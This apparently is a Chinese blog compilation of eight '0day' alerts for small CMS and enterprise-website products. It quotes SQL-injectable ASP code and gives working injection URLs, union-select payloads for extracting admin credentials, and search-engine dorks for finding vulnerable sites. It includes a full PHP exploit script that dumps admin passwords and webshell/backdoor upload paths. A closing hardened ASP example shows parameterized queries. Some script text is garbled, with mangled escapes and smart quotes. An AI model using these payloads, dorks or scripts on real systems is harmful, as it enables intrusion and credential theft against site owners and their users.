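Today the editor has compiled the Amanda (阿曼达) enterprise website system cookie injection 0day vulnerability alert for you. This article has 8 parts in total; let's read them together!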

Part 1: Amanda (阿曼达) enterprise website system cookie injection 0day vulnerability alert
amanda/cg_ProductShow.asp
---------------------------------------------------------------
<%@ LANGUAGE = VBScript.Encode %>
<%
ShowSmallClassType=ShowSmallClassType_Article
dim ID
ID=trim(request("ID"))
if ID="" then
response.Redirect("cg_Product.asp")
end if
sql="select * from cg_Product where ID=" & ID & ""
Set rs= Server.CreateObject("ADODB.Recordset")
rs.open sql,conn,1,3
if rs.bof and rs.eof then
response.write ""
else
rs("Hits")=rs("Hits")+1
rs.update
%>
------------------------------------------------------------
Only GET and POST are filtered, but request("ID") also reads cookies, so cookie injection exists; an injection relay page is all that is needed.
amanda/cg_ProductShow.asp
localhost/jmCook.asp?jmdcw=169%20and%201=1
Part 2: CGSAIL website management system 0day vulnerability alert
<%
dim sql
dim rs
sql = "select * from [" & CgsailPrefix & "admin] where id=" & request("id")
Set rs = Server.CreateObject("ADODB.RecordSet")
rs.Open sql,conn,1,1
photo=trim(rs("photo"))
%>
localhost/user_view.asp?id=1%20and%201=1
Part 3: 114la (114啦) injection 0day batch vulnerability alert
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die;
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen(“$url”, 80, $errno, $errstr, 30);
if (!$sock) die(“$errstr ($errno)n”);
$data = “username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~”;
fwrite($sock, “POST $path/feedback/feedback.php HTTP/1.1rn”);
fwrite($sock, “Accept: */*rn”);
fwrite($sock, “Referer: $url/#Mrn”);
fwrite($sock, “Accept-Language: zh-cnrn”);
fwrite($sock, “Content-Type: application/x-www-form-urlencodedrn”);
fwrite($sock, “Accept-Encoding: gzip, deflatern”);
fwrite($sock, “User-Agent: Mozillarn”);
fwrite($sock, “Host: $urlrn”);
fwrite($sock, “Content-Length: ”.strlen($data).“rn”);
fwrite($sock, “Connection: Keep-Alivern”);
fwrite($sock, “Cache-Control: no-cachern”);
fwrite($sock, “Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAONrnrn”);
fwrite($sock, $data);
$headers = “”;
while ($str = trim(fgets($sock, 4096)))
$headers .= “$strn”;
echo “n”;
$body = “”;
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry '(.*)1'/', $body, $arr);
$result=explode(“_”,$arr[1]);
print_r(“Exploit Success! nusername:”.$result[0].“npassword:”.$result[1].“nGood Luck!”);
}else{
print_r(“Exploit Failed! n”);
}
ob_end_flush();
?>
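Part 4: 86cms2011SP6 enterprise site-building system 0day vulnerability alert
This one leaves me rather speechless: it is exactly the same as the one published earlier. I really don't know who is copying whom.
Continuing.
It can be exploited directly to get a shell.
Configuration: IIS 6.0
Find the keywords yourselves. I don't like batch runs.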
Part 5: Tianyuan (天缘) enterprise website system universal 0day vulnerability alert
Batch: www.google.cn
inurl:Products.asp?main_id=1
Find the admin back end yourself, then change the address in action=""
EXp:
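Enter the name of the administrator you want to create
Enter the password of the administrator you want to create
This is, of course, the password confirmation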
Author:Lan3a
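Save the code above as html or htm
Part 6: Game website program 0DAY vulnerability alert
Author: amxking
Discovered by: 百事可乐
More precisely, this should count as a backdoor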
inurl:Find.asp 您的位置 >> 客服中心 >> 找回密码
Direct webshell upload:
www.XXX.com/user/situjiaduotu2.asp
One-line backdoor, password: value
www.XXX.com/htmledit/Include/upfile_class.asp
www.XXX.com/htmleditIncludeDeCode.asp
Read the database for privilege escalation:
D:webwww.xxx.comIncConfig.asp
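Part 7: CmsEasy (易通) enterprise website system injection vulnerability alert
Latest injection vulnerability in the CmsEasy (易通) enterprise website system.
Injection EXP: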
www.xxx.com/celive/js/include.php?cmseasylive=1111&departmentid=0
Run it directly in Havij.
Error keyword: online.gif
Add table name: cmseasy_user
Columns: userid,username,password
Baidu keyword: Powered by CmsEasy
Part 8: 918 enterprise marketing website showcase system injection vulnerability alert
news_show.asp
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<%
id=request.QueryString("id")
k=request.QueryString("k")
%>
<%
set rs3=server.CreateObject("adodb.recordset")
sql3="select * from hlf_news where id=" & id
rs3.open sql3,conn,1,1
if not rs3.eof then
%>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
127.0.0.1/news_show.asp?id=106union select 1,admin,3,4,password,6 from hlf_admin
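The ASP excerpts in Part 1 (cg_ProductShow.asp), Part 2 (user_view.asp) and Part 8 (news_show.asp) all concatenate a request value straight into the SQL text. Below is a hardened version of the cg_ProductShow.asp lookup, as an added example that is not the vendor's code; it assumes conn is the already-open ADODB.Connection the original relies on, and the same pattern applies to the other two files.

```asp
<%
' Added example: hardened ID handling for cg_ProductShow.asp.
' Assumption: "conn" is an open ADODB.Connection created by an include not shown on the page.
Const adInteger = 3, adParamInput = 1, adCmdText = 1
Const adOpenKeyset = 1, adLockOptimistic = 3

Dim rawID, productID, re, cmd, rs

' Request("ID") searches QueryString, Form, Cookies, ClientCertificate and
' ServerVariables in that order, so a filter on GET/POST alone misses cookies.
' Name the one collection the page actually expects.
rawID = Trim(Request.QueryString("ID"))
If rawID = "" Then Response.Redirect "cg_Product.asp"

' Accept only a short run of decimal digits. IsNumeric is too loose:
' it also accepts values such as "1e5" or "&H10".
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawID) Then
    Response.Status = "400 Bad Request"
    Response.End
End If
productID = CLng(rawID)

' Bind the value as a typed parameter instead of concatenating it into the SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "select * from cg_Product where ID = ?"
cmd.Parameters.Append cmd.CreateParameter("ID", adInteger, adParamInput, , productID)

' Same cursor and lock types as the original (1, 3) so the Hits update still works.
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open cmd, , adOpenKeyset, adLockOptimistic
If rs.BOF And rs.EOF Then
    Response.Write ""
Else
    rs("Hits") = rs("Hits") + 1
    rs.Update
End If
%>
```

With the value read from one named collection, checked against a digits-only pattern and bound as an integer parameter, a cookie named ID is never consulted and non-numeric input never reaches the database.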